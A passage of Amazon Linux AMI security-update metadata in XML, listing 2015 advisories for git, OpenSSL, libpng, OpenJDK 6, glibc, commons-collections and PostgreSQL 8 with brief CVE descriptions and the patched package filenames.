version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-python-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-web" version="3.7.1" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-web-3.7.1-2.19.amzn1.i686.rpm</filename></package><package name="ganglia" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-debuginfo" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-debuginfo-3.7.2-2.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-613</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-613: medium priority package update for git</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7545:
A flaw was found in the way the git-remote-ext helper processed certain URLs. If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user&#039;s system.
1269794:
CVE-2015-7545 git: arbitrary code execution via crafted URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7545" title="" id="CVE-2015-7545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-email" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.4.3" release="7.42.amzn1" epoch="0" 
arch="noarch"><filename>Packages/perl-Git-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.4.3" release="7.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.4.3-7.42.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.4.3" release="7.42.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.4.3-7.42.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.4.3-7.42.amzn1.i686.rpm</filename></package><package name="git" version="2.4.3" release="7.42.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.4.3-7.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-614</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-614: medium priority package update for openssl</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3196:
A race condition flaw, leading to a double free, was found in the way OpenSSL handled pre-shared keys (PSKs). A remote attacker could use this flaw to crash a multi-threaded SSL/TLS client.
1288326:
CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint
CVE-2015-3195:
A memory leak vulnerability was found in the way OpenSSL parsed certain PKCS#7 or CMS data. A remote attacker could use this flaw to cause an application that parses PKCS#7 or CMS data from untrusted sources to crash due to memory exhaustion.
1288322:
CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak
CVE-2015-3194:
A denial of service flaw was found in the way OpenSSL verified certain signatures using the RSA PSS algorithm. If client authentication was enabled, a remote attacker could craft an X.509 client-side certificate which, when processed, could possibly crash a TLS/SSL server or client using OpenSSL.
1288320:
CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194" title="" id="CVE-2015-3194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195" title="" id="CVE-2015-3195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196" title="" id="CVE-2015-3196" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-13.88.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="13.88.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-devel-1.0.1k-13.88.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="13.88.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-13.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-615</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-615: medium priority package update for libpng</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8472:
An array-indexing error was discovered in the png_convert_to_rfc1123() function of libpng. An attacker could possibly use this flaw to cause an out-of-bounds read by tricking an unsuspecting user into processing a specially crafted PNG image.
1281756:
CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions
CVE-2015-7981:
It was discovered that the png_get_PLTE() and png_set_PLTE() functions of libpng did not correctly calculate the maximum palette sizes for bit depths of less than 8. In case an application tried to use these functions in combination with properly calculated palette sizes, this could lead to a buffer overflow or out-of-bounds reads. An attacker could exploit this to cause a crash or potentially execute arbitrary code by tricking an unsuspecting user into processing a specially crafted PNG image. However, the exact impact is dependent on the application using the library.
1276416:
CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7981" title="" id="CVE-2015-7981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8472" title="" id="CVE-2015-8472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libpng-debuginfo" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="2.14.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-2.14.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-2.14.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="2.14.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-616</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-616: important priority package update for 
java-1.6.0-openjdk</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2086.html" 
title="" id="RHSA-2015:2086" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-617</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-617: important priority package update for glibc</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5277:
It was discovered that the nss_files backend for the Name Service Switch in glibc would return incorrect data to applications or corrupt the heap (depending on adjacent heap contents). A local attacker could potentially use this flaw to execute arbitrary code on the system.
1262914:
CVE-2015-5277 glibc: data corruption while reading the NSS files database
CVE-2015-1781:
A buffer overflow flaw was found in the way glibc&#039;s gethostbyname_r() and other related functions computed the size of a buffer when passed a misaligned buffer as input. An attacker able to make an application call any of these functions with a misaligned buffer could use this flaw to crash the application or, potentially, execute arbitrary code with the permissions of the user running the application.
1199525:
CVE-2015-1781 glibc: buffer overflow in gethostbyname_r() and related functions with misaligned buffer
CVE-2015-1473:
A stack overflow flaw was found in glibc&#039;s swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.
1209105:
CVE-2015-1473 glibc: Stack-overflow in glibc swscanf
CVE-2015-1472:
A heap-based buffer overflow flaw was found in glibc&#039;s swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.
1188235:
CVE-2015-1472 glibc: heap buffer overflow in glibc swscanf
CVE-2013-7423:
It was discovered that, under certain circumstances, glibc&#039;s getaddrinfo() function would send DNS queries to random file descriptors. An attacker could potentially use this flaw to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data.
1187109:
CVE-2013-7423 glibc: getaddrinfo() writes DNS queries to random file descriptors under high load
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423" title="" id="CVE-2013-7423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1472" title="" id="CVE-2015-1472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1473" title="" id="CVE-2015-1473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781" title="" id="CVE-2015-1781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5277" title="" id="CVE-2015-5277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" 
release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.163.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-618</id><title>Amazon 
Linux AMI 2014.03 - ALAS-2015-618: important priority package update for apache-commons-collections</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7501:
It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.
1279330:
CVE-2015-7501 apache-commons-collections: InvokerTransformer code execution during deserialisation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7501" title="" id="CVE-2015-7501" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-commons-collections-testframework-javadoc" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-testframework-javadoc-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-javadoc" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-javadoc-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-testframework" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-testframework-3.2.1-11.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-619</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-619: medium priority package update for postgresql8</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5288:
A memory leak error was discovered in the crypt() function of the pgCrypto extension. An authenticated attacker could possibly use this flaw to disclose a limited amount of the server memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5288" title="" id="CVE-2015-5288" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2081.html" title="" id="RHSA-2015:2081" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package 
name="postgresql8-debuginfo" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" 